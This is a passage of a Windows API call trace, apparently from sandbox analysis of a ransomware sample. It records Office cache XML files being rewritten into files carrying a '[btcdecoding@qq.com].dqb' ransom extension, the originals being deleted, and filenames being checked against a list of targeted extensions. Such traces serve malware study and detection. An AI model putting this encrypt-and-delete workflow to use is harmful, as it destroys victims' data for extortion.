returned 1 [0033.379] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0033.422] GetLastError () returned 0x0 [0033.422] ReadFile (in: hFile=0x178, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x106f, lpOverlapped=0x0) returned 1 [0033.447] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x1070, lpOverlapped=0x0) returned 1 [0034.211] ReadFile (in: hFile=0x178, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0034.211] WriteFile (in: hFile=0x1a4, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0034.211] SetEndOfFile (hFile=0x1a4) returned 1 [0034.211] CloseHandle (hObject=0x1a4) returned 1 [0034.212] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.212] SetEndOfFile (hFile=0x178) returned 1 [0034.213] CloseHandle (hObject=0x178) returned 1 [0034.213] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0034.214] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0034.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.214] lstrlenW (lpString=".doc") returned 4 [0034.214] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.214] lstrlenW (lpString=".docx") returned 5 [0034.214] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.214] lstrlenW (lpString=".pdf") returned 4 [0034.214] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.214] lstrlenW (lpString=".xls") returned 4 [0034.214] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.214] lstrlenW (lpString=".xlsx") returned 5 [0034.214] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.214] lstrlenW (lpString=".ppt") returned 4 [0034.214] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.214] lstrlenW (lpString=".zip") returned 4 [0034.214] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.214] lstrlenW (lpString=".rar") returned 4 [0034.214] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.214] lstrlenW (lpString=".bz2") returned 4 [0034.214] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.214] lstrlenW (lpString=".7z") returned 3 [0034.214] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.214] lstrlenW (lpString=".dbf") returned 4 [0034.214] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.214] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.214] lstrlenW (lpString=".1cd") returned 4 [0034.214] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.215] lstrlenW (lpString=".jpg") returned 4 [0034.215] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.215] lstrlenW (lpString=".doc") returned 4 [0034.215] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString=".docx") returned 5 [0034.215] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0034.215] lstrlenW (lpString=".pdf") returned 4 [0034.215] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString=".xls") returned 4 [0034.215] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString=".xlsx") returned 5 [0034.215] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0034.215] lstrlenW (lpString=".ppt") returned 4 [0034.215] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.215] lstrlenW (lpString=".zip") returned 4 [0034.215] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0034.215] lstrlenW (lpString=".rar") returned 4 [0034.215] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString=".bz2") returned 4 [0034.215] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString=".7z") returned 3 [0034.215] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0034.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.215] lstrlenW (lpString=".dbf") returned 4 [0034.215] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.215] lstrlenW (lpString=".1cd") returned 4 [0034.215] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0034.215] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0034.215] lstrlenW (lpString=".jpg") returned 4 [0034.215] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0034.216] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0034.216] lstrlenW (lpString="WordMUI.xml") returned 11 [0034.216] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.968] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1800) returned 1 [0034.968] CloseHandle (hObject=0x188) returned 1 [0034.968] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 0x2020 [0034.968] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0034.968] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0034.968] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.968] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0034.968] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0034.968] GetLastError () returned 0x0 [0034.969] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x708, lpOverlapped=0x0) returned 1 [0035.128] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x710, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x710, lpOverlapped=0x0) returned 1 [0035.129] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.129] WriteFile (in: hFile=0x180, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xea, lpOverlapped=0x0) returned 1 [0035.129] SetEndOfFile (hFile=0x180) returned 1 [0035.129] CloseHandle (hObject=0x180) returned 1 [0035.130] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.130] SetEndOfFile (hFile=0x188) returned 1 [0035.130] CloseHandle (hObject=0x188) returned 1 [0035.130] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.131] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml")) returned 1 [0035.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.131] lstrlenW (lpString=".doc") returned 4 [0035.131] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.131] lstrlenW (lpString=".docx") returned 5 [0035.131] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.131] lstrlenW (lpString=".pdf") returned 4 [0035.131] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.131] lstrlenW (lpString=".xls") returned 4 [0035.131] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.131] lstrlenW (lpString=".xlsx") returned 5 [0035.131] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.131] lstrlenW (lpString=".ppt") returned 4 [0035.131] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.131] lstrlenW (lpString=".zip") returned 4 [0035.131] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.131] lstrlenW (lpString=".rar") returned 4 [0035.131] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.131] lstrlenW (lpString=".bz2") returned 4 [0035.131] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.131] lstrlenW (lpString=".7z") returned 3 [0035.131] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.131] lstrlenW (lpString=".dbf") returned 4 [0035.131] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.131] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.131] lstrlenW (lpString=".1cd") returned 4 [0035.131] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.132] lstrlenW (lpString=".jpg") returned 4 [0035.132] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.132] lstrlenW (lpString=".doc") returned 4 [0035.132] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString=".docx") returned 5 [0035.132] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0035.132] lstrlenW (lpString=".pdf") returned 4 [0035.132] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString=".xls") returned 4 [0035.132] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString=".xlsx") returned 5 [0035.132] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0035.132] lstrlenW (lpString=".ppt") returned 4 [0035.132] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.132] lstrlenW (lpString=".zip") returned 4 [0035.132] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.132] lstrlenW (lpString=".rar") returned 4 [0035.132] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString=".bz2") returned 4 [0035.132] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString=".7z") returned 3 [0035.132] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.132] lstrlenW (lpString=".dbf") returned 4 [0035.132] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.132] lstrlenW (lpString=".1cd") returned 4 [0035.132] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.132] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 74 [0035.132] lstrlenW (lpString=".jpg") returned 4 [0035.132] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.133] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.133] lstrlenW (lpString="Setup.xml") returned 9 [0035.133] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.180] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=1452) returned 1 [0035.183] CloseHandle (hObject=0x188) returned 1 [0035.217] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 0x2020 [0035.217] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.217] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.217] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.217] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.217] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0035.224] GetLastError () returned 0x0 [0035.224] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x5ac, lpOverlapped=0x0) returned 1 [0035.239] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0x5b0, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0x5b0, lpOverlapped=0x0) returned 1 [0035.240] ReadFile (in: hFile=0x188, lpBuffer=0x3540020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x227fed4, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesRead=0x227fed4*=0x0, lpOverlapped=0x0) returned 1 [0035.240] WriteFile (in: hFile=0x1a0, lpBuffer=0x3540020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x227fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3540020*, lpNumberOfBytesWritten=0x227fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0035.240] SetEndOfFile (hFile=0x1a0) returned 1 [0035.240] CloseHandle (hObject=0x1a0) returned 1 [0035.240] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.241] SetEndOfFile (hFile=0x188) returned 1 [0035.241] CloseHandle (hObject=0x188) returned 1 [0035.241] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x2020) returned 1 [0035.242] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0035.242] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.242] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.242] lstrlenW (lpString=".doc") returned 4 [0035.242] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.242] lstrlenW (lpString=".docx") returned 5 [0035.242] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.242] lstrlenW (lpString=".pdf") returned 4 [0035.242] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.242] lstrlenW (lpString=".xls") returned 4 [0035.242] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.242] lstrlenW (lpString=".xlsx") returned 5 [0035.242] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.242] lstrlenW (lpString=".ppt") returned 4 [0035.242] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.242] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.242] lstrlenW (lpString=".zip") returned 4 [0035.242] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.242] lstrlenW (lpString=".rar") returned 4 [0035.242] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.242] lstrlenW (lpString=".bz2") returned 4 [0035.242] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.242] lstrlenW (lpString=".7z") returned 3 [0035.242] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.242] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.242] lstrlenW (lpString=".dbf") returned 4 [0035.242] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.242] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.242] lstrlenW (lpString=".1cd") returned 4 [0035.242] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.243] lstrlenW (lpString=".jpg") returned 4 [0035.243] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.243] lstrlenW (lpString=".doc") returned 4 [0035.243] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString=".docx") returned 5 [0035.243] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1 [0035.243] lstrlenW (lpString=".pdf") returned 4 [0035.243] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString=".xls") returned 4 [0035.243] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString=".xlsx") returned 5 [0035.243] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1 [0035.243] lstrlenW (lpString=".ppt") returned 4 [0035.243] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.243] lstrlenW (lpString=".zip") returned 4 [0035.243] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0035.243] lstrlenW (lpString=".rar") returned 4 [0035.243] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString=".bz2") returned 4 [0035.243] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString=".7z") returned 3 [0035.243] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0035.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.243] lstrlenW (lpString=".dbf") returned 4 [0035.243] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.243] lstrlenW (lpString=".1cd") returned 4 [0035.243] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0035.243] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 72 [0035.243] lstrlenW (lpString=".jpg") returned 4 [0035.243] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0035.244] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0035.244] lstrlenW (lpString="OfficeMUISet.xml") returned 16 [0035.244] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.244] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x227ff1c | out: lpFileSize=0x227ff1c*=819) returned 1 [0035.244] CloseHandle (hObject=0x188) returned 1 [0035.244] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml")) returned 0x2020 [0035.244] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0035.244] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0035.244] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x227fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.244] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, 